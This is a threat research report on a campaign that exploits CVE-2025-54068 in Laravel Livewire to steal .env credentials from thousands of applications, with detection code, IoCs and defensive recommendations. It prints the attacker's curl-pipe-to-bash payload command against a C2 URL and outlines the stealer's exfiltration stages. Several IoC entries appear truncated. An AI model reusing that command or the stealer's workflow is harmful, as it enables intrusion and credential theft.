CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised

Introduction

On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-2025-54068, a critical unauthenticated RCE vulnerability in Laravel Livewire v3 (versions up to v3.6.3).

The campaign, first documented here, has been running for several months, as evidenced by the large volume of stolen data. Recovery and analysis of the attacker’s exfiltration infrastructure revealed credentials harvested from 6,167 distinct applications spanning dozens of countries and sectors, from e-commerce and healthcare to financial services, education, and government. The attacker’s FTP server contained 1,851+ database dumps and 18+ email lists with over 26 million addresses, indicating the stolen credentials were being actively exploited. Attribution indicators throughout the malware and associated infrastructure point to an Indonesian-origin threat actor.

Attack Vectors and TTPs

Initial Access: CVE-2025-54068 Exploitation

CVE-2025-54068 is a critical vulnerability in Laravel Livewire v3 caused by improper validation of component property updates during the framework’s hydration process. When a Livewire component state is restored from a browser request, Livewire v3 (up to v3.6.3) fails to verify the integrity of the submitted data before deserializing it. An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.

The following HTTP request, reconstructed from our captured attack traffic, illustrates the exploitation:

[Image: the reconstructed exploitation HTTP request]

For full technical details on this vulnerability, please see the disclosure here.

Payload Analysis

The exploitation requests we captured contained serialized PHP objects constructed using PHPGGC gadget chains. These chains abuse legitimate PHP classes already present in Laravel applications to achieve code execution during deserialization. The attacker’s payload executes the following command:

curl -skfsSL hxxps://xantibot[.]pw/database-sell/shoc.enz | tr -d '\r' | bash >/dev/null 2>&1 &

This fetches a shell script from the attacker’s C2 server and pipes it directly into bash, executing it in the background with all output suppressed.
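The hydration flaw is a deserialization bug, so the defender-side signal is a serialized PHP object arriving inside component state. The following Python is an added example (not Imperva WAF logic or Livewire code) of that check; it assumes Livewire v3's update endpoint is /livewire/update and runs over constructed request bodies rather than captured traffic.

```python
import json
import re

# Opening of a serialized PHP object, O:<len>:"<class>":<n>:{ ; namespaced
# class names contain backslashes, which appear doubled inside JSON strings.
PHP_OBJECT_RE = re.compile(r'O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')

# Assumed path of Livewire v3's component update endpoint (not quoted in the report).
LIVEWIRE_UPDATE_PATH = "/livewire/update"


def _json_strings(node):
    """Yield every string value nested anywhere in a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        yield from (s for v in node.values() for s in _json_strings(v))
    elif isinstance(node, list):
        yield from (s for v in node for s in _json_strings(v))


def find_php_objects(body: str) -> list[str]:
    """Return class names of serialized PHP objects found in a request body.

    The raw body is checked first; if the body is JSON (as Livewire component
    state is), every nested string is also checked after decoding, so an object
    hidden behind JSON escaping is still found.
    """
    candidates = [body]
    try:
        candidates.extend(_json_strings(json.loads(body)))
    except ValueError:
        pass
    found: list[str] = []
    for text in candidates:
        for match in PHP_OBJECT_RE.finditer(text):
            cls = match.group(0).split('"')[1].replace("\\\\", "\\")
            if cls not in found:
                found.append(cls)
    return found


def classify_request(method: str, path: str, body: str) -> str:
    """'block' a Livewire update carrying a serialized object, 'watch' such an
    object on any other path, 'allow' everything else."""
    if not find_php_objects(body):
        return "allow"
    if method == "POST" and path == LIVEWIRE_UPDATE_PATH:
        return "block"
    return "watch"


# Constructed sample bodies (not captured traffic): a normal component update and
# one whose snapshot string smuggles a serialized stdClass object.
BENIGN_BODY = json.dumps({"components": [{"snapshot": '{"data":{"count":1}}'}]})
SUSPECT_BODY = json.dumps({"components": [{"snapshot": 'O:8:"stdClass":0:{}'}]})
```

Note that the raw body of SUSPECT_BODY does not match the regex because JSON escapes the quotes; only the decoded string does, which is why the check walks the parsed document.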

Malware Analysis

The credential stealer deployed in this campaign is a 5,269-byte Bash shell script named shoc.enz (SHA256: 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e). At the time of our analysis, this sample was not present in VirusTotal.

Execution Flow

The malware follows an eight-stage execution process:

  1. Environment Setup: Creates a temporary working directory at /tmp/xxxxx
  2. Process Check: Verifies no existing shoc.sh processes are running to prevent multiple instances
  3. File Discovery: Recursively scans the entire filesystem for .env files using the find command
  4. Credential Extraction: Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values
  5. Data Collection: Copies matching files to a staging directory with randomized filenames
  6. Compression: Archives collected files using zip or tar.gz
  7. Exfiltration: Uploads archives to three separate C2 channels
  8. Cleanup: Deletes the local staging directory to remove forensic evidence

Exfiltration Infrastructure

The threat actor operates a redundant three-channel exfiltration system:

Channel     Endpoint                   Purpose
Primary     FTP @ 47.129.100.149:21    Main credential storage
Secondary   api.telegram.org           Notifications and small file uploads
Tertiary    upload.gofile.io           Backup cloud storage

Our investigation confirmed active access to all three channels. The FTP server contained 7 directories of stolen data, including full database dumps such as FULL_DUMP_[REDACTED_IP]>_2026-04-29_0418.sql.gz. The GoFile account showed owner-level access with 11,179 files totalling 309.9 MB.

Attribution Indicators

Multiple indicators point to an Indonesian-origin threat actor: Indonesian-language comments in the malware source code, a timezone reference to Asia/Jakarta, and the Telegram handle @ashtarotz (“黐線佬 Wong Gen Deng”) linked to xantibot[.]pw, a domain that presents publicly as a legitimate anti-bot service while hosting the malware payload. Metadata from the domain and the Telegram channel also points to an Indonesian origin.

The GoFile exfiltration account was registered to azrilsyahputra1337@gmail[.]com. Cross-referencing this address against public breach data reveals it appears in three separate historical breaches of BreachForums (November 2022, August 2025, and March 2026), placing the operator within underground breach communities over an extended period.

What Was Stolen: Analysis of the Recovered Data

Laravel applications store all sensitive configuration in a single .env file: database credentials, API keys, payment processor secrets, cloud access keys, and encryption keys. This makes the file an exceptionally high-value target. A single .env file can provide everything needed to access the application’s database, impersonate users, process payments, and access cloud infrastructure.

Analysis of the recovered collection revealed credentials from 6,167 distinct applications. Of 21,916 unique files analysed, 29% declared a production environment, though the true proportion is higher as many files labeled local contained live payment keys and real domain URLs.

The breakdown of exposed credentials:

Credential Type                                   Count
Database passwords (real, non-default)            14,566 (66.5%)
Production applications with DB credentials       5,784
Confirmed live Stripe secret keys (sk_live_)      188
Valid AWS IAM credentials (AKIA format)           381
JWT secrets                                       2,929
Google OAuth client secrets (GOCSPX-)             2,409
Filament admin panel passwords                    2,232
SMTP passwords                                    7,176 (32.7%)

The FTP server contained over 1,850 full database dump files, confirming the stolen credentials were actively used to extract database contents.

Targeting

The campaign scanned for vulnerable Laravel installations indiscriminately, with victims spanning online gambling and betting (400+ platforms, predominantly Brazilian and Southeast Asian operators), e-commerce, healthcare, education, logistics, and financial services. Multiple confirmed .gov domains were present in the dataset, showing the scanner made no distinction between commercial and public-sector targets. Recognizable open-source Laravel applications were present in the dataset, including the invoicing platform Invoice Ninja, accounting software Akaunting, event ticketing platform Attendize, photo gallery Lychee, and restaurant management system TastyIgniter. Applications were registered across .com, .ru, .site, .online, .br, .tr, .id, .ke, and dozens of other TLDs. Any organization running unpatched Laravel Livewire v3 was a potential victim.

Conclusion and Recommendations

This campaign illustrates how straightforward credential theft, when combined with a high-impact vulnerability and automated scanning, can scale to thousands of victims in a short window. Recovery of the exfiltration infrastructure revealed credentials from over 6,000 distinct applications, including 188 live Stripe payment keys, 381 valid AWS IAM credentials, and database passwords for nearly 5,800 confirmed production systems. For many victims, the initial server compromise is only the beginning of the exposure.

We recommend the following actions for defenders:

  1. Patch immediately: Update Laravel Livewire to version 3.6.4 or later to remediate CVE-2025-54068. This is the single most effective mitigation.
  2. Block outbound FTP: Production web servers should not require outbound FTP access. Block port 21 egress and alert on any connection attempts to 47.129.100.149.
  3. Monitor for suspicious API access: Alert on connections from web servers to api.telegram.org and upload.gofile.io, which are atypical for production Laravel applications.

If you believe your organization has been compromised, rotate all database credentials and Laravel APP_KEY values immediately, and review database access logs for unauthorized activity.
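The three-channel exfiltration pattern described under Exfiltration Infrastructure and recommendations 2 and 3 above translate directly into egress monitoring. The following Python is an added example (not an Imperva product rule) that flags those channels over constructed proxy log lines; the log format is assumed, and the infrastructure values are the ones named in this report.

```python
import re

# Exfiltration and payload-delivery infrastructure named in the report.
C2_IPS = {"47.129.100.149"}
C2_HOSTS = {"api.telegram.org", "upload.gofile.io", "xantibot.pw"}
FTP_PORT = 21

# Constructed egress log lines (not from the incident). Assumed format:
# "<timestamp> src=<ip> dst=<ip-or-host> dport=<port> proto=<proto>"
SAMPLE_LOG = """\
2026-05-24T10:01:02Z src=10.0.1.15 dst=151.101.1.69 dport=443 proto=tcp
2026-05-24T10:01:05Z src=10.0.1.15 dst=xantibot.pw dport=443 proto=tcp
2026-05-24T10:01:09Z src=10.0.1.15 dst=api.telegram.org dport=443 proto=tcp
2026-05-24T10:01:12Z src=10.0.1.15 dst=47.129.100.149 dport=21 proto=tcp
2026-05-24T10:01:20Z src=10.0.1.15 dst=upload.gofile.io dport=443 proto=tcp
2026-05-24T10:02:00Z src=10.0.1.22 dst=203.0.113.9 dport=21 proto=tcp
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")


def classify_line(line: str):
    """Return (severity, reason) for one log line, or None if nothing matches."""
    m = LINE_RE.match(line)
    if not m:
        return None
    dst, dport = m["dst"], int(m["dport"])
    if dst in C2_IPS or dst in C2_HOSTS:
        return ("high", f"known campaign infrastructure {dst}")
    if dport == FTP_PORT:
        # Recommendation 2: web servers have no business speaking FTP outbound.
        return ("medium", "outbound FTP from a web server")
    return None


def scan(log: str) -> list[tuple[str, str, str]]:
    """Return (source host, severity, reason) for every flagged line."""
    hits = []
    for line in log.splitlines():
        verdict = classify_line(line)
        if verdict:
            hits.append((LINE_RE.match(line)["src"], *verdict))
    return hits


def hosts_hitting_multiple_channels(log: str, minimum: int = 2) -> dict[str, set[str]]:
    """Map each source host to the distinct campaign endpoints it contacted,
    keeping only hosts that reached at least `minimum` of them (the stealer
    uploads to all three channels in one run)."""
    seen: dict[str, set[str]] = {}
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m and (m["dst"] in C2_IPS or m["dst"] in C2_HOSTS):
            seen.setdefault(m["src"], set()).add(m["dst"])
    return {host: dsts for host, dsts in seen.items() if len(dsts) >= minimum}
```

A host that contacts more than one of the channels within a short window is a far stronger signal than any single connection, since the stealer uses all three in one run.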

Indicators of Compromise

IP Addresses

  • 86.88.234 (Attack source)
  • 129.100.149 (FTP C2 server)
  • 63.67.153 (Webhook server)

Domains and URLs

  • pw
  • hxxps://xantibot[.]pw/database-sell/shoc.enz
  • hxxps://webhook[.]site/b156c0b1-3e2f-41b4-a9a3-f492e50a0595

File Hashes (SHA-256)

  • 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e (shoc.enz)

MITRE ATT&CK Mapping

Technique ID   Technique Name                                       Campaign Usage
T1190          Exploit Public-Facing Application                    CVE-2025-54068 exploitation
T1059.004      Unix Shell                                           Bash script execution via piped curl
T1105          Ingress Tool Transfer                                curl retrieval of shoc.enz payload
T1083          File and Directory Discovery                         Recursive filesystem scan for .env files
T1552.001      Credentials In Files                                 .env file harvesting
T1560.001      Archive Collected Data: Archive via Utility          zip/tar.gz staging archive creation
T1041          Exfiltration Over C2 Channel                         Telegram Bot API exfiltration
T1048.003      Exfiltration Over Unencrypted Non-C2 Protocol        FTP exfiltration to 47.129.100.149
T1567.002      Exfiltration to Cloud Storage                        GoFile uploads
T1070.004      File Deletion                                        Staging directory cleanup post-exfiltration
T1036          Masquerading                                         Randomized archive and staging folder names

Imperva Threat Research continues to monitor this campaign. Imperva customers are fully protected against exploitation of CVE-2025-54068. Customers requiring further guidance on this vulnerability are encouraged to contact Imperva support.